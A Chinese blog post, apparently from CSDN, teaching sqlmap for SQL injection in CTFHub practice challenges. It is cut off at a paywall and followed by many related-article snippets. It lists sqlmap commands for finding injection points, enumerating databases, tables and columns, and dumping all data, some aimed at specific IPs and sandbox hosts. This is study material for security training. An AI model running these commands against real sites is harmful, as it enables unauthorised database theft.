sqlmap使用基本方法和具体操作流程(CTFHub演练)

最新推荐文章于 2025-03-03 18:06:05 发布
最新推荐文章于 2025-03-03 18:06:05 发布
阅读量1.1k 收藏 32
点赞数 28
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80097039/article/details/136460982
版权

一、学习工具使用方法

先简单了解一些相关知识

对url爆破:
sqlmap -u url #判断注入点
sqlmap -u url --current-dbs #查看当前所有数据库
sqlmap -u url --current-db #查看当前数据库

sqlmap -u url -D 库名 --tables #爆表
sqlmap -u url -D 库名 -T 表名 --columns #爆字段
sqlmap -u url -D 库名 -T 表名 --C 字段名1,字段名2 --dump #爆数据
sqlmap -u url -D 库名 --dump-all #爆出数据库中所有数据
对抓取包爆破:
sqlmap -r http.txt #http.txt使我们抓取的http请求包
sqlmap -r http.txt -p username #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测

二、开始做题

1、整数型注入

这里的话我使用CTFHub进行学习,需要在kali上打开

首先输入sqlmap看看能不能用sqlmap

出现这个说明可以使用 

接下来看看是否存在sql注入漏洞。那就尝试注入一下子

sqlmap -u "网址" --current-dbs,得到库名为sqli

最低0.47元/天 解锁文章
Nigoridl
关注
2024sqlmap语句大全及解析,ctfshow201--213边做题边写笔记
2301_81133475的博客
08-09 2048
ctf.show官方paload给出以上脚本,复制成新的文件就行了,我用的是kali自带sqlmap在目录usr/share/sqlmap目录里的tamper目录下vim个ctf209.py,然后正常用。加入对'select' 的过滤,可以用upppercase这个脚本,但是sqlmap默认就是大写的SELECT 直接按照原来的命令也完全可以,但如果是正常操作的话在207命令后面改为。HTTP/1.1有7种请求方法:1、GET;:这里表名他改了,你可以用我207的方法,那样就不用找表列了,知道数据库就行。
CTFHub (web-SQL-布尔盲注sqlmap)
m0_64444909的博客
05-09 887
一、关于sqlmap 一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, SybaseSAP MaxDB。采用五种独特的SQL注入技术,分别是: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语
BUUCTF靶场练习——第二周
weixin_47063945的博客
07-22 772
整理了buuctf靶场第七第八道web题目的做题笔记并整理了涉及到的部分知识扩展
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
ewii12567的博客
03-03 2831
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…这里root的权限最多,很明显它就是数据库的管理员账号。
sqlmap使用方法 --ctf
时光凉春衫薄的博客
03-05 710
普通注入 Sqlmap -u “http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx”--dbs 找到一个sql的注入点 探测他的库名 access的直接探表名 Sqlmap -u “http://”http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx”-D 探测出来的库名 --tables 探测库名后探...
CTFHUB|SQL注入(sqlmap
m0_60651303的博客
07-14 1363
差不多学了4天的SQL手工注入,学习一下sqlmap使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTFHub——技能树——SQL注入(sqlmap
sparename的博客
12-26 7680
SQL注入整数型注入sqlmap简介检测注入实战解题字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入UA注入Refer注入过滤空格 整数型注入 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用u
【无标题】CTFSQLMAP
qq_51802152的博客
12-18 972
CTFSQLMAP
CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用,两种方法一道题
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
Sqlmap使用手册中文版
01-13
一旦确定存在漏洞,Sqlmap能深入挖掘数据库信息,甚至可能控制底层文件系统操作系统。 Sqlmap自2006年发展至今,已经成为渗透测试领域不可或缺的工具。随着OWASP(开放Web应用安全项目)对Web应用漏洞严重性的...
关于ctfhub中cookie注入方法sqlmap自动注入
m0_62819604的博客
10-23 791
首先,我们可以使用burpsuite进行抓包。 如图所示,可以发现注入点为id=1。 然后我们可以使用kali linux里的sqlmap自动注入。 首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs 发现数据库为sqli 然后查询数据库表sqlmap -u "http://challenge-593b57751..
sqlmap使用ctfhub靶场查询SQL注入+查询Cookie注入+查询UA注入+Refer注入
NSQ0207的博客
07-20 710
CTFHub靶场+cookie注入+查询UA注入+Refer注入
SQLMap简介
xiaojiakun的博客
12-10 301
简介 SQLMap是一款先进的自动执行SQL注入的审计工具。它可以针对指定URL 进行扫描发现并利用SQL注入漏洞 当给SQLMap一个URL时https://baike.baidu.com/item/%E5%AE%A1%E8%AE%A1%E8%BD%AF%E4%BB%B6/6127577?fr=aladdinSQLMap会执行以下操作 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注...
Sqlmap使用教程【超全】
MickeyMouse1928的博客
05-11 7428
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
CTF刷题--SQL注入(sqlmap
weixin_43882862的博客
08-13 2950
靶场第一题,解法2,使用sqlmap 解题思路(在kali下操作) 1、检测是否有sql注入漏洞 检测出来有id sqlmap -u http://59.63.200.79:8003/?id=1 2、获取当前用户 sqlmap -u http://59.63.200.79:8003/?id=1 --current-user 3、获取当前数据库 sqlmap -u http://59.63.200.79:8003/?id=1 --current-db 4、获取所有数据库 sqlmap -u http:/
CTFHub--SQL注入--injection sqlmap
2402_82644071的博客
09-18 550
id=x" 【查询是否存在注入点2. --dbs 【检测站点包含哪些数据库3. --current-db 【获取当前的数据库名4. --tables -D "db_name" 【获取指定数据库中的表名 -D后接指定的数据库名称5. --columns -T "table_name" -D "db_name" 【获取数据库表中的字段。
SQLMAP解决sql注入CTF题目
sleepywin的博客
03-23 553
sqlmap解决sql注入
CTF-web 第十二部分 sqlmap专题
iamsongyu的博客
11-25 2649
  sqlmap开源又功能强大的工具,支持现在几乎所有的数据库,比国内的任何工具都强。支持get,post ,cookie注入。可以添加cookieuser-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效, 指纹识别技术判断数据库。   当给sqlmap这么一个url (http://192.168.136.131/sqlmap/mysql/get_...
sqlmap tamper脚本_CTF小白入门- Sqlmap 安装及使用
weixin_39537049的博客
11-26 374
Sqlmap 简介及安装Sqlmap 是开源的可以自动检测并利用sql漏洞的渗透测试工具。CTF题目中经常遇到 sql注入题目,如果题目比较简单可以直接通过Sqlmap 拿到flag。Sqlmap 是基于python开发的工具。如果在Linux 系统中使用Sqlmap 直接下载源码安装即可。如果要在Windows系统中使用Sqlmap ,需要先安装python环境。http://sqlmap.or...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值